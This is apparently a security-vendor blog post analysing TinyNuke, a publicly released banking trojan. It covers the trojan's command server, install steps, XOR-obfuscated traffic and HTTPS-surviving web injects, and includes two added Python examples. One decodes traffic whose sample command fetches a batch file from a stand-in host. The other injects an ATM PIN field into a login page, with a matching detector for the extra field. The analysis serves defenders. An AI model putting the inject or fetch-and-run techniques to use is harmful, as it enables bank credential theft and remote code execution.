TinyNuke May Be a Ticking Time Bomb
On March 12, 2017, a low-profile developer uploaded mostly functional botnet code named TinyNuke to GitHub. The user, Aainz, uses his real name in connection with this code. It is not unusual for security professionals or hobbyists to release proof-of-concept code so the industry can learn from the latest techniques and test its own defenses against them. Aainz's release looks closer to that of many bad actors before him: the TinyNuke codebase was released as a fully weaponized botnet with built-in features, including HTML code injection, a technique typically used to steal credentials for web services. The author himself describes the botnet as a Zeus-style banking trojan. Zeus was first found in the wild in 2007 and became one of the most widely known and used banking trojans to date.
The included readme.txt reads as expected and provides a feature list and installation steps. It is interesting to see the author also spend a portion of the readme distancing himself from the botnet's previous history. He first attacks other researchers for their claims about the functionality of his code and then attempts to separate himself from the underground alias Gosya. Gosya had, at the time, been banned from a popular Russian underground forum for aggressively advertising various versions of this trojan, including under the names NukeBot, Micro Banking, and the current name, TinyNuke.
Underground forums are a popular place for new actors to learn, and eventually teach, the tricks of the trade. The primary forum in question is very popular among would-be malware developers, and it is not uncommon to see new actors show off their code there to get feedback. Gosya, however, was undercutting the competition with prices ranging from $2,500 to $4,000, creating a stir in these communities and building a reputation as a potential scammer. Aainz, in an effort to separate himself from both the sale and the illegal use of his botnet, did two things. First, he released the code publicly on GitHub, rebutting claims that he sold the botnet himself, infected users, or is in any way related to Gosya. Second, he took his arguments back to the Russian forums to state his case, with at least some success, as this account has yet to be banned.
Whether or not Gosya is Aainz, or any of these accounts are related, the codebase is now publicly available for black hats and white hats alike. To understand how it might affect the security landscape, particularly in the banking industry, we downloaded the source code and tested the setup and functionality of TinyNuke.
TinyNuke has three main components: a command-and-control server; a portable executable (the bot) with basic functionality; and a DLL that is loaded into memory. The server component consists mainly of PHP code hosted on an Apache web server, with a MySQL database as the backend. The database stores basic information about the active bots, the commands sent, and reporting. The server communicates with the bot over HTTP on port 80; the port and communication method are not customizable by design. By default, the bot obfuscates the payload of the communication so that commands and files are not transmitted in clear text. The obfuscation is a simple byte-wise XOR using the bot's ID as the key, which hides the traffic from casual inspection but is not encryption: anyone who learns the bot ID, or who can guess a few bytes of plaintext, can decode it. The server IP address or DNS name is configured in the bot source and fixed at compile time, so it cannot be changed once the executable has been built.
The bot itself has three main functions: installing itself on the victim system, communicating with the server, and injecting the DLL provided by the server into memory. During installation, the bot copies itself to the user's Roaming AppData directory, using its bot ID as the filename, and relaunches itself from that location.
On relaunch, the bot verifies that it has been installed and then starts manipulating the system. It modifies registry entries for Internet Explorer and Firefox settings to prepare for web injections and makes its first attempt to contact the server. The bot waits until it receives the expected response from the server. Once connected, it requests the DLL from the server and injects that DLL into a dllhost.exe process. This DLL holds the main functionality of the bot. TinyNuke was always run with administrative privileges during our analysis: the author assumes the attacker has already compromised the system and obtained administrative privileges before running the bot, and we found that many of the observable install and initial-run steps would not execute under a lower-privileged account.
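To make the obfuscation concrete, here is a short Python example written for this post, not code from TinyNuke. It applies a repeating-key XOR keyed by the bot ID to a constructed command string, decodes it when the bot ID is known (the ID is also the filename the bot installs under in Roaming AppData, so an analyst with access to the infected host usually has it), and recovers the ID from captured traffic alone when a few bytes of plaintext are predictable. The repeating-key layout, the bot ID, and the command string are assumptions for illustration; the bot's actual routine may differ in detail.

```python
# Added example (not TinyNuke's code): repeating-key XOR keyed by the bot ID,
# the scheme described for bot/server traffic, and the two ways a defender
# undoes it. Assumes the key is the bot-ID string repeated over the payload;
# the exact TinyNuke routine may differ. Sample values are constructed.


def xor_with_bot_id(data: bytes, bot_id: str) -> bytes:
    """Obfuscate or de-obfuscate (XOR is its own inverse) with the bot ID as a repeating key."""
    key = bot_id.encode()
    if not key:
        raise ValueError("bot id must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_capture(payload: bytes, bot_id: str) -> str:
    """Case 1: the bot ID is known (e.g. read from the Roaming AppData filename),
    so a captured HTTP body decodes directly."""
    return xor_with_bot_id(payload, bot_id).decode("utf-8", errors="replace")


def keystream_from_known_plaintext(payload: bytes, known_plaintext: bytes) -> bytes:
    """Case 2: the bot ID is unknown but some plaintext is predictable.
    Ciphertext XOR plaintext at the same offset yields the keystream bytes there."""
    return bytes(c ^ p for c, p in zip(payload, known_plaintext))


def recover_bot_id(payload: bytes, known_prefix: bytes, id_length: int) -> str:
    """With a known plaintext prefix at least as long as the ID, the whole key falls
    out, because the keystream simply repeats the ID starting at offset 0."""
    keystream = keystream_from_known_plaintext(payload, known_prefix)
    if len(keystream) < id_length:
        raise ValueError("known plaintext shorter than the bot id; only a partial key is recoverable")
    return keystream[:id_length].decode("ascii")


# Constructed sample traffic (not real TinyNuke output)
BOT_ID = "A1B2C3D4E5F6"
SAMPLE_COMMAND = b"cmd=download_execute&url=http://example.invalid/update.bat"
SAMPLE_WIRE = xor_with_bot_id(SAMPLE_COMMAND, BOT_ID)

if __name__ == "__main__":
    print("on the wire :", SAMPLE_WIRE.hex())
    print("decoded     :", decode_capture(SAMPLE_WIRE, BOT_ID))
    # An analyst who guesses only that the body starts with "cmd=download_execute"
    # recovers the 12-byte bot ID without ever seeing the sample on disk.
    print("recovered id:", recover_bot_id(SAMPLE_WIRE, b"cmd=download_execute", len(BOT_ID)))
```

The second path is the one that matters for network defenders: because the panel's command vocabulary is fixed and small, a few bytes of predictable plaintext are enough to peel the key off any captured session, after which every other message from that bot decodes too.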
Once the DLL has been injected into memory, the bot checks in with the server at a user-defined interval, which can be set on the server's settings page (shown below). A time period can also be defined after which the server considers a bot dead or unresponsive. The attacker can then issue several commands to the bot from the server's PHP command interface; these are executed at the bot's next check-in. During our research we tested the download-and-execute command and the web-inject functionality. The bot also has built-in support for a SOCKS proxy, a VNC connection, and updating the DLL, which we did not test in our environment.
The download-and-execute command lets the attacker download any file hosted on a web server and execute it, which opens a wide range of attack scenarios. The command does not allow command-line parameters to be passed, which limits it somewhat, but executing a batch file (or a similar wrapper) that supplies whatever parameters the attacker needs is a simple workaround. As demonstrated in the video posted below, a .bat file was used for testing and executed without difficulty.
The web-inject functionality allows an attacker to inject code into a web page the victim has navigated to. The bot pulls the inject definitions from an attacker-defined file on the web server. The video posted below demonstrates this feature using an alert message box.
It is also worth noting that this feature works with HTTPS sites without invalidating the certificate: a Zeus-style inject alters the content inside the browser after TLS has been terminated, not on the wire, so the browser still shows a valid certificate and padlock. This lets an attacker leverage the trust of a "secure" website to persuade a victim to enter sensitive data into a malicious form, and the technique is heavily used to collect credentials on services such as banking web portals. Because the modification happens client-side, TLS alone does not protect against it; the controls that apply are server-side checks for submitted fields the genuine form never contained, and client-side page-integrity checks.
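The following Python is an added example, not TinyNuke's or Zeus's code. It shows how a Zeus-style inject file turns a genuine login page into one that asks for an extra field, and the server-side comparison that catches the extra field. The set_url / data_before / data_inject / data_after layout is assumed (the bot's actual file format is not reproduced here), and the inject file and login page are constructed for the example.

```python
# Added example (not TinyNuke's or Zeus's code): a minimal applier for
# Zeus-style web inject rules, plus a check for fields the genuine form never
# had. The set_url / data_before / data_inject / data_after layout is assumed;
# the inject file and login page below are constructed.
from __future__ import annotations

import fnmatch
import re
from dataclasses import dataclass


@dataclass
class WebInject:
    url_mask: str       # glob matched against the page URL, e.g. https://*.bank.invalid/login*
    data_before: str    # literal text; the payload is inserted right after its first occurrence
    data_inject: str    # HTML/JS to insert
    data_after: str     # optional literal text that must follow the insertion point


def parse_injects(text: str) -> list[WebInject]:
    """Parse the block format:
       set_url <mask> [flags]
       data_before / data_inject / data_after ... data_end
    Flags after the mask (e.g. GP) are ignored in this simplified parser."""
    rules: list[dict] = []
    section = None
    buf: list[str] = []
    for line in text.splitlines():
        if line.startswith("set_url "):
            rules.append({"url_mask": line.split()[1],
                          "data_before": "", "data_inject": "", "data_after": ""})
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line, []
        elif line == "data_end" and section is not None and rules:
            rules[-1][section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return [WebInject(**r) for r in rules]


def apply_injects(url: str, html: str, rules: list[WebInject]) -> str:
    """Return the page as the victim's browser would render it after the inject."""
    for rule in rules:
        if not fnmatch.fnmatchcase(url, rule.url_mask):
            continue
        start = html.find(rule.data_before)
        if start == -1:
            continue
        insert_at = start + len(rule.data_before)
        if rule.data_after and html.find(rule.data_after, insert_at) == -1:
            continue
        html = html[:insert_at] + rule.data_inject + html[insert_at:]
    return html


_INPUT_NAME = re.compile(r'<input\b[^>]*\bname="([^"]+)"', re.I)


def unexpected_fields(genuine_html: str, observed_html: str) -> list[str]:
    """Names of <input> fields present in what the victim saw but absent from what
    the server sent. The same comparison, run over a POST body against the form the
    server rendered, flags harvested values the genuine form never asked for."""
    known = set(_INPUT_NAME.findall(genuine_html))
    return [n for n in _INPUT_NAME.findall(observed_html) if n not in known]


# Constructed sample inject file and login page (not from a real campaign)
SAMPLE_INJECTS = """set_url https://*.example-bank.invalid/login* GP
data_before
<input type="password" name="password">
data_end
data_inject
<br><label>ATM PIN:</label><input type="text" name="pin">
data_end
data_after
data_end
"""

SAMPLE_LOGIN_PAGE = """<html><body>
<form action="/login" method="post">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" value="Log in">
</form></body></html>"""

if __name__ == "__main__":
    rules = parse_injects(SAMPLE_INJECTS)
    tampered = apply_injects("https://www.example-bank.invalid/login?lang=en", SAMPLE_LOGIN_PAGE, rules)
    print(tampered)
    print("fields the genuine page never had:", unexpected_fields(SAMPLE_LOGIN_PAGE, tampered))
```

Nothing in the tampered page is visible to TLS: the form still posts to the bank's own /login endpoint over the original secure session, which is why the padlock survives and why the detection has to happen at the application layer, by rejecting or alerting on the extra field.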
This release of bot source code does not present any new or unique techniques. It does, however, pull them together in an easy-to-use framework, making these features readily available to attackers who previously may not have been able to use them.
Fortunately, a few issues with the TinyNuke codebase prevent it from working as-is, at least in our environment. The bugs that had to be fixed to get the bot deployed were more difficult to troubleshoot than to fix; implementing the fixes was straightforward, so we expect them to be addressed soon if they have not been already. The bot code also assumes privileged access on the client, which moderately increases the difficulty of using the codebase. Most experienced actors would have their own solution for this, but it may be a hurdle for new actors and may severely limit their choice of potential victims.
Unfortunately, the setup is relatively easy for a moderately tech-savvy actor. Setting up a MySQL server and an Apache web server is free and heavily documented by their respective communities, and readily available tools cover most of the installation requirements, so the botnet infrastructure can be stood up in less than an hour. The panel's functionality is barebones, with many features already seen in the wild. However, since it enables arbitrary code execution on the victim's machine, there really is no limit to how the botnet can be used.
We expect other actors to build upon this codebase, improving features and adding new functionality. This codebase itself is unlikely to become a major botnet, but other actors now have a convenient framework to start from. In the past we have seen public code modified to meet the needs of bad actors to great effect: Hidden Tear, open-source ransomware released for educational purposes, was taken by malicious actors, who fixed and improved the released codebase. Today hundreds of variants exist and more continue to surface. It remains to be seen whether TinyNuke will see the same success in these circles, but it is certainly possible. For now, the banking industry should be diligent, as it is the primary advertised target. Other industries should be cautious as well, since the same features can be used against their business, particularly against their customer base.
Part 1: https://youtu.be/a4K3mQtwfKY
Part 2: https://youtu.be/MbWgDSLqbUQ
This blog was written by Douglas McKee and Charles McFarland